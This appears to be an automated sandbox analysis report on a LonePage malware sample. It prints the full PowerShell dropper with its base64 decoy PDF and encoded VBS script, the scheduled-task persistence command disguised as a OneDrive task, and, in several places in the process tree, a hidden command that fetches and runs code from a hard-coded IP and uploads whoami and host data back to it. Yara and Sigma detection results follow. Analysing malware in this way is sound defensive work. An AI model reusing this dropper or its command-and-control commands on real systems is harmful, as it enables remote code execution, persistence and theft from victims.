4YJVTRecMEGEwmFbcvGi86J2wqYYIMEicEdsMEGg0wg6CDCaDBBhIvGGEwSJ220EGEGErfWZgwEGZggTPi+CBn6GeDAIMIM8ImfBcIMzBgIMzBAgzw6s4IbwgzWR8zWZEZAhStmZiktry3eui4eibuDRcBt+i4ahu0XDRbvT0W70XDg0Td2uhhEx2cAhM2JIMZMA4QZ8UwIQxE0WOGcCFwhcQIhociwQeVWk20rNaVwzWkg2yN2Em39W6bZFdraTbSs1pJsM1hJNsjhpNv7Lik23dLyKOGicPp1SDbtcg79kY4cV2p37rdUt4f+P/abXXed+6/rbtpf7TSVsjz0iK+mm16adGHpbTTU1p3cN/1//6++/Xr3/9f//v9t//+5b3ne9b7b/Wtv9b+3V+mn//v1d/x/9fpr/9X3X/9K63v3f3/9f////Xj/+v/8jpfr39rx//////+x/H///FX/HH/jr7S//Xf76+146Xtdfevf/3++raXtL/Xf//9fEL/6S/44S0h//EL/6X//Hv/+or+v/79fXwv/H/5IviiR/H4X/iv/+S09+9RCBbX///CXi/Rb///8JYb1vh+ix///v/+hHfrHF//8V79LX+RwG/+lsOSsMK/JDvwlr/JQH63r+qbrI3Bom9kV9//8HuSHfr/+G/X1320u9v0v/w3/1/6IOO4qnSwwuRjv//kr/f0uv//9L9v//X/S7/f/+Se37aWPt//+3O6ftnH6/v/pfr/r+2etfr/3r0q79L2t1/9f//t7ev6917///6t7a/67/67aS+f+vb9dfb6///IPm7+1Xf16/uy8ut7IPe7r7r6+621rbW9Jba//t//9aum2hScWqelq3WmnF2qaUXVtodxaq3phJ/bSVYrpd+0ru9tul/VUu0sayIPQtukITaSDBAwgciD2KQq2k4oLIo9C20kKcJINikLatUk7dUowqd6SEWg000uwtrYT7FQopfaaaYJkrTW1tNJsVBMQlYSbUV7dIQpFf27FXaEVSDCE1MWEwpZEMIQaERDCYQMELChBhCdYWE1LIhhCGhBgpFnDUIRHFpoRENCI8REaDiIiIiIiNOIjNpGSJYiPrp6fqVNGGpkYIhnX/5BT6cHRwM52WgucZHGeoMwIcIXF670u3/hvfxER/4fZLEyPKvh3a49aX0/db0g61/v//StR/8fHfEa/9ffhJftaCdaX+Oulv/Nd7dWGl+uw/t/4S27//pbsV1//r16r7mRa///6fX783q1cqUlSdrD7X8Vp3fxXVrGpotOwqqLQiIiOGo0Mt8fX6RkXCEcIYFMBDAhgQwExtPv9aaaDtUHatfu1XH////r////6////B+v+FxOP/11+v6////+v//77X+t92vQhhC7TT9Gk/JuSQiI+/j/////8tC1FlC+WgIHOBUzIYETv4XsEDCaCXarQXfGW1xLdBfS/XyfI2MlAygs2Z1Z0ZKs2yQR2cZ2VDKM2yNkdSIFfPEcFNipmoMJgmcFPGoQYQZmEOgp4wqaDPjNmYFPswHCZ8U2KXFNinwpDBEwVBngXCYTOAuF/+jQ9Fw0Td9xaDRcNY00XDW+4aLh/0FhouGmmqaaYX+wmkndLpumpHDRcOm2mW4tLD09N07TCDTSJwg2lsXaJw0XD/4d2ttl/26cNVQdJ6cPQZLHtvTVMvK209OlTLztslmfC702k8+F3B/v1+9dbfTdN+9U/vT++//XvXT+6TdP7/////6q0v9auttJ6/////bGhrVqsf//410k2vx0k3/XFWvtf/+rXXq9CP//FccUut8Qlpbjtdaiv/f4r/3//jC4KFbX5i9v80FdvjBY2NvjC/7//8FwRMf9f1/r64RY/w2uF////ouOgsNuv4Yel4Rr23Wk/seEa/3//+XOl6W3f9tt/hL9ZeNBcudE/yx8vGl////9L0t3r93r10390v60vdLf/v//pel3G33cfVaPbuttf/S+1/7qzT/////+afWvrbHr/+l7/dev/9f//a0m13/6f///9f129tfqt9//03UMJfdet1pf/pel/71FfQvVbTW1MVPaxm+mrCVhNbdCtNNbVV06Ju+0TdtVCTaabaZG/ROGyDwmsNt7xaLhr7/cQy+/tvTLtM1gkFQZN4aDTVTOSiGRXYOGmmgwgwmFQbeW5J6CdoNBpQwmmXcNNB6ptlwmmqtvYJEbtJ8GEDCYTCbfur1vtVT1VB+n6DvCf/rpJ3poOk3+l1t+9JN071+k6slj8H9+77/q9f/7+31vT//9N9Y718x/v7aW/trVN/NNP//t3xe67X///tIcav//Xx+/0tf1dJK//7rrev/VtviopP/9+vv////fq//rpax/XaQpOul21/67fVK0v9v0v69////+/S07XVr/fCT1r4r/q3fCpP/7fHG2v//HIXv/2sfxWjD33/rjj8Lx6M+34IuLd0v7H9///w//2P0eN9P/7atv1giY/9L/pYbda/ZY+HL66X//J9v/95bvCXLt6Wn6/t1LHfpP//9Lb6/0uXz3//66eX3/86vuP29Lv/bpt9/QXy/xWkl0u2Nf6/9iv///v//6949GffXG7W30l/116//9f//r//+v/26960m/Xa/v0v+tJLr7Vfpf+/r//7/ul7161rbpV/W///S6X//9fruv/v/W/7/uv60m7/a17tLX+tKqepjrWzA+rwv62la2t3q2le2l7eseq22kq5GamQ3Jbf2n/9LTbCaatIeE0k0KTTa7VNCNVQq1TCdpJp2mmkmn3aoX2khp3aWna6elUJsTjiKwQoJqmEgmnggcUE0DTCaTFJoGxhBhNhhNMIIJoexQTpiqCbcUxYQYQYTTCD0rtSeKqeqYT1T1tfCDC6DVO17BNPhhXtNO9Mjf/9cRYQYSy9C9isZeywIRDBCIiIiIhhTacMJhCMJhQhERERiPT+IjT0IybIZpbpe6/qv3S5ZyBBE7AxcRLi9JbS9UnSdpoJtBOwmE008RER/+Wmaxt0/+u01EctBaKaCkgZA82ZOMigyKESM2ZVRShkQMiYyBjmSkyXGRBHxnUjqMlyLdQC6DRnaDOAwXIJhM+KYECZwNgQZ4gmcBgjiFwgTBUGbEMCBM4DCZwigZcIYFhQoVGcMItw0W7CTo2Um0+LRdt9E3bScXhppE3em7SJuHad7XBBJhAgraTaVhBMnddJtF45bk3tpNsJhJNsnwSLxtzOShtBpINui7hhNJPLejYw6BBhMKgSaBJNraTaBNA/7pPCoOyff2q3dJtks009VTuk/VaUnlJu/qkml2lfYQX961db7b+6TX109b+lb1+k1T1//Snylvuuli+1q441/+/q3Vjj+3767Q4x660qdJb778cUu/cf6H/3/X1HWh1nHa60t0vXXS1S/8Lqv//f/6/Lq84/Wo//+lgqX/gsf//x/+jP/219GH/X/9cIuLf/hE3/////pf/16XWl9v/0sN/+guT7//8v//1/7f6XkEMaI42//kEbjVLb/9Lp7////4pbX4+K6I4fQb//RG4el91+l+5P/f/7/Zp15P+T/XXptLb//pv//6/7X+v/uv67Xv36+3Stt7f++vv+v62l7+l+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3d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgoJCTxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiCgkJCQl4bWxuczp4YXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iPgoJCQk8eGFwOkNyZWF0ZURhdGU+MjAyMy0wMi0xM1QwODo1OTo1NyswMTowMDwveGFwOkNyZWF0ZURhdGU+CgkJCTx4YXA6Q3JlYXRvclRvb2w+Q2Fub24gaVItQURWIDY1NTUgIFBERjwveGFwOkNyZWF0b3JUb29sPgoJCTwvcmRmOkRlc2NyaXB0aW9uPgoJCTxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiCgkJCQl4bWxuczpwZGY9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGRmLzEuMy8iPgoJCQk8cGRmOlByb2R1Y2VyPkFkb2JlIFBTTCAxLjNlIGZvciBDYW5vbjwvcGRmOlByb2R1Y2VyPgoJCTwvcmRmOkRlc2NyaXB0aW9uPgoJCTxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiCgkJCQl4bWxuczpkYz0iaHR0cDovL3B1cmwub3JnL2RjL2VsZW1lbnRzLzEuMS8iPgoJCQkJPGRjOmZvcm1hdD5hcHBsaWNhdGlvbi9wZGY8L2RjOmZvcm1hdD4KCQk8L3JkZjpEZXNjcmlwdGlvbj4KCQk8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgoJCQkJeG1sbnM6eGFwTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iPgoJCQk8eGFwTU06RG9jdW1lbnRJRD51dWlkOmZkZWRlOTYzLTAwMDAtNDE0Mi00MzQ0LTQ1NDYwMDAwMDAwMDwveGFwTU06RG9jdW1lbnRJRD4KCQk8L3JkZjpEZXNjcmlwdGlvbj4KPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4KPD94cGFja2V0IGVuZD0idyI/PgoKZW5kc3RyZWFtCmVuZG9iagozIDAgb2JqCjw8IC9UeXBlIC9QYWdlcyAvQ291bnQgMSAvS2lkcyBbMTAgMCBSIF0gPj4KZW5kb2JqCnhyZWYKMCAxNCAKMDAwMDAwMDAwMCA2NTUzNSBmIAowMDAwMDAwMDE2IDAwMDAwIG4gCjAwMDAwMDAyNjQgMDAwMDAgbiAKMDAwMDA1NTQ3MyAwMDAwMCBuIAowMDAwMDAwMzU4IDAwMDAwIG4gCjAwMDAwMjI0MzEgMDAwMDAgbiAKMDAwMDAyNjMwNCAwMDAwMCBuIAowMDAwMDI2NzAyIDAwMDAwIG4gCjAwMDAwNTEwODggMDAwMDAgbiAKMDAwMDA1MTE2OCAwMDAwMCBuIAowMDAwMDUxMzcwIDAwMDAwIG4gCjAwMDAwNTE2MTMgMDAwMDAgbiAKMDAwMDA1NDI2OCAwMDAwMCBuIAowMDAwMDU0NDUzIDAwMDAwIG4gCnRyYWlsZXIKPDwKL1NpemUgMTQKL0luZm8gMSAwIFIKL1Jvb3QgMiAwIFIKL0lEWzw3MTM0NGRlNzFjMTA3MzI1ZTY3MGEwMzQzMTY3Yjc5OT48NzEzNDRkZTcxYzEwNzMyNWU2NzBhMDM0MzE2N2I3OTk+XQo+PgpzdGFydHhyZWYKNTU1MzIKJSVFT0YK';$fil=[System.Convert]::FromBase64String($temp);set-content $home\appdata\local\temp\document.pdf -value $fil -encoding byte;&$home\appdata\local\temp\document.pdf;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgc3RhcnQtc2xlZXAgMzk7c3RhcnQtc2xlZXAgKGdldC1yYW5kb20gLW1pbiA1IC1tYXggNDMpO3N0YXJ0LXNsZWVwIDExOyRpaWs9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRmbG09JGlpay5kb3dubG9hZGRhdGEoJ2h0dHA6Ly8yLjU5LjIyMi45ODo0MzgyMC9LZm5nbkhieEZIamF1Y2llL3BhZ2UxMDcvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskaGJuPUlFWCAkamtyOyRiamRvKz0kaGJufE91dC1zdHJpbmc7W2J5dGVbXV0kZHJweT1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjpVdGY4LkdldEJ5dGVzKCRiamRvKTt9O3N0YXJ0LXNsZWVwIDEwOyR1ams9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50O3N0YXJ0LXNsZWVwIDE2OyR1amsudXBsb2FkZGF0YSgnaHR0cDovLzIuNTkuMjIyLjk4OjI4NDAyL3BhZ2UxMDcnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Recorded.vbs -value $c;schtasks.exe /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Acrobat.exe (PID: 2940 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\document.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 7452 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7672 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1728,i,12702411498753033684,7387674129069318371,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • schtasks.exe (PID: 6596 cmdline: "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • wscript.exe (PID: 7272 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 4796 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\Recorded.vbsJoeSecurity_LonePageYara detected LonePageJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000010.00000002.4545241066.00000107F6460000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
      0000000F.00000002.4358131758.00000245D7680000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
        0000000F.00000002.4358131758.00000245D7686000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
          0000000F.00000002.4358131758.00000245D76C5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
            00000006.00000002.3475796002.000001DE79AE7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
              Click to see the 20 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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